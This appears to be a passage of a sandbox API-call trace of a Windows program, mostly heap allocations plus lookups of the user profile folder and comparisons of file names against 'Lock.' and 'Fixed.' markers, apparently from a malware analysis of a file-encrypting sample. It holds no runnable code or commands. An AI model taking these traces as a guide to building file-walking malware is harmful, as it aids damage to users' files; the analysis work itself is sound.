FindClose (in: hFindFile=0x9e1cb8 | out: hFindFile=0x9e1cb8) returned 1 [0210.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0210.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0210.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0210.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.476] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0210.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0210.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0210.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0210.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0210.476] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6d8 [0210.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6f0 [0210.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0210.477] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0210.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0210.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0210.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0210.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0210.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0210.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0210.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0210.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0210.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0210.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0210.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0210.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5e) returned 0x2a750d0 [0210.478] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/Hv6N_Hm7BbFlazd6N.gif", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Hv6N_Hm7BbFlazd6N.gif", lpFilePart=0x8cf650*="Hv6N_Hm7BbFlazd6N.gif") returned 0x2e [0210.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a750d0 | out: hHeap=0x2af0000) returned 1 [0210.478] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Hv6N_Hm7BbFlazd6N.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\hv6n_hm7bbflazd6n.gif")) returned 0xffffffff [0210.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0210.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.479] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0210.479] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.479] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0210.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0210.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0210.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0210.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0210.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0210.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ko-PEUGJ.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o-PEUGJ.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-PEUGJ.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEUGJ.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EUGJ.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UGJ.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJ.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0210.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0210.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0210.481] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0210.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0210.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0210.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0210.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0210.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1a) returned 0x2a77d50 [0210.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0210.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ko-PEUGJ.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o-PEUGJ.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-PEUGJ.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEUGJ.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EUGJ.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UGJ.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJ.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0210.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0210.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6300 | out: hHeap=0x2af0000) returned 1 [0210.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0210.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0210.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0210.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.482] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0210.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0210.482] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0210.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0210.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0210.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b88 [0210.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0210.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0210.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0210.483] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa738 [0210.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa690 [0210.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0210.483] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0210.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0210.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0210.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0210.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0210.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0210.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0210.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0210.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0210.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0210.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0210.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0210.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a38 [0210.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0210.485] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7c8 [0210.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa600 [0210.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 